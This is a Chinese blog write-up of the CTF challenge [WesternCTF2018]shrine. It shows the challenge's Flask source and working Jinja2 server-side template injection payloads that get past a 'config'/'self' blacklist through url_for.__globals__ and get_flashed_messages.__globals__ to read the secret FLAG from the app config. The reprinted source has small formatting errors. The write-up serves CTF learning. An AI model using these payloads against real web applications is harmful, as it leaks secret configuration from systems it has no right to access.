[WesternCTF2018]shrine 1

最新推荐文章于 2024-08-05 10:52:38 发布
最新推荐文章于 2024-08-05 10:52:38 发布
阅读量1.6k 收藏 3
点赞数 2
分类专栏: BUUCTF 文章标签: web安全 flask
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/123641745
版权 
知识点:flask的ssti

把它排一下(可以在pycharm按ctrl+alt+L然后再调调就好了)
在这里插入图片描述

import flask
import os

app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
#使不知道哪的FLAG赋值给当前app的配置变量FLAG
#应该需要我们拿到config的FLAG值
@app.route('/')

def index():
    return open(__file__).read()
           @app.route('/shrine/')
           #装饰器,也就是说我们注入的格式为/shrine/{{....}}

def shrine(shrine):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        #替换掉()
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
        #过滤
    return flask.render_template_string(safe_jinja(shrine))
    #数据上传模板
if __name__ == '__main__':
    app.run(debug=True)

访问/shrine/{{1*2}},显示2说明有ssti漏洞。
在这里插入图片描述
虽然过滤了config,但我们还有其他方法,一个一个试试。
这边没有显示出object的子类,这种行不通,换一种。
在这里插入图片描述
python还有一些内置函数,比如url_for和get_flashed_messages

/shrine/{{url_for.__globals__['current_app'].config['FLAG']}}

get_flashed_messages

返回之前在Flask中通过 flash() 传入的闪现信息列表。把字符串对象表示的消息加入到一个消息队列中,然后通过调用 get_flashed_messages() 方法取出(闪现信息只能取出一次,取出后闪现信息会被清空)。

大概意思应该是获取传递过来的数据
根据题目:
在这里插入图片描述
找到当前的app
在这里插入图片描述
在这里插入图片描述

/shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}
#__globals__会以字典类型返回当前位置的全部全局变量。

参考:
wp

succ3
关注
专栏目录
flask之ssti [WesternCTF2018]shrine1
m0_75178803的博客
03-18 1072
打开题目。
[WesternCTF2018]shrine 1(flask)
weixin_45577185的博客
09-10 294
非常完美的答案 分析源码 app.config['FLAG'] = os.environ.pop('FLAG') 注册了一个名为FLAG的config,猜测这就是flag,如果没有过滤可以直接{{config}}即可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s 上面这行代码把黑名单的东西遍历并设为空,例如:
[WesternCTF2018]shrine1
最新发布
kw741951的博客
08-05 263
发现注册了一个名为FLAG的config,这里可能有flag,通过url_for()与globals()函数,绕过黑名单。存在flask-jinja2模板注入,并且存在黑名单过滤。发现了current_app()函数。查看其中的config得到flag。输入shrine/{{7*7}}打开题目,没什么头绪。查看页面源代码看一下。
模板注入 [WesternCTF2018]shrine1
m0_75178803的博客
02-23 439
发现注册了一个名为FLAG的config,这里可能有flag,通过url_for()与globals()函数,绕过黑名单。输入shrine/{{7*7}}验证成功。存在flask-jinja2模板注入,发现了current_app()函数。查看这个里面的config。
BUUCTF [WesternCTF2018]shrine
qq_42812036的博客
02-15 2490
[WesternCTF2018]shrine模板注入 题目打开查看源码,给的python代码,看到flask,想到模板注入 可以这样测试: 看源码app.config['FLAG'] = os.environ.pop('FLAG') 推测{{config}}可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 不过python还有一些内置函数,...
BUUCTF:[WesternCTF2018]shrine
qq_46230755的博客
12-30 273
打开网页是一题代码审计 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinj
[WesternCTF2018]shrine
夜幕下的灯火阑珊的博客
05-11 205
知识点 Jinja2 url_for 参考 https://www.cnblogs.com/Cl0ud/p/12316287.html https://www.cnblogs.com/wangtanzhi/p/12238779.html
[WesternCTF2018] web题-shrine
BROTHERYY的博客
12-30 281
开题即送源码一份 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') # 有一个名为flag的config @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') # 路径 def shrine(shrine): def safe_j
shrine-webdav:提供用于Shrine的简单WebDAV存储
05-11
gem 'shrine-webdav' 用法 假设您具有报告模型,该模型应该能够将数据存储在远程WebDAV存储中。 class Report < ApplicationRecord end # == Schema Information # # Table name: reports # # id :uuid not ...
【网络安全 | CTF】攻防世界 shrine 解题详析
等风来
07-24 3992
进入环境:格式化代码:这段代码创建了一个 Flask 应用对象,并设置了一个名为 FLAG 的配置项,其值来自环境变量。然后定义了两个路由,一个用于返回当前文件的内容,另一个用于渲染 Jinja2 模板。推测flag在名为FLAG的config中,但黑名单过滤了config,通过Jinja2联想SSTI注入在这个程序中,/shrine/ 是定义的路由路径,会匹配到处理该路径的函数。于是构造路径:回显如下:说明SSTI可行在 Flask 中,url_for 函数是定义在 Flask 的全局命名空间中的
WesternCTF2018_shrine
抒情诗
05-08 469
这个想了半天没啥思路,直接查别人的wp,贴地址:https://blog.csdn.net/qq_42812036/article/details/104324923 0x00 开始的页面猛一看乱七八糟,原来查源码会把它排一下版,感觉挺实用,记下来。。。看到flask就差不多能想到python模板注入了。以下是代码: import flask import os app = flask.Fla...
buuctf-[WesternCTF2018]shrine(小宇特详解)
小宇的web博客
02-26 1572
buuctf-[WesternCTF2018]shrine(小宇特详解) 1.先看题目 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //注册了一个名为FLAG的config @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:
2010年全面解读Java教程:从基础知识到进阶应用
1. Java基础知识: - 学习Java的基础概念,如1.1中的`Javaᾲ䘠`,介绍了Java的核心语法和基本特性。 - Java编程环境设置,如1.2中的`Java䈝䀰Ⲵ⢩ Shrine`,讲述了JDK的安装和配置,以及Java开发环境的搭建。 - `...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值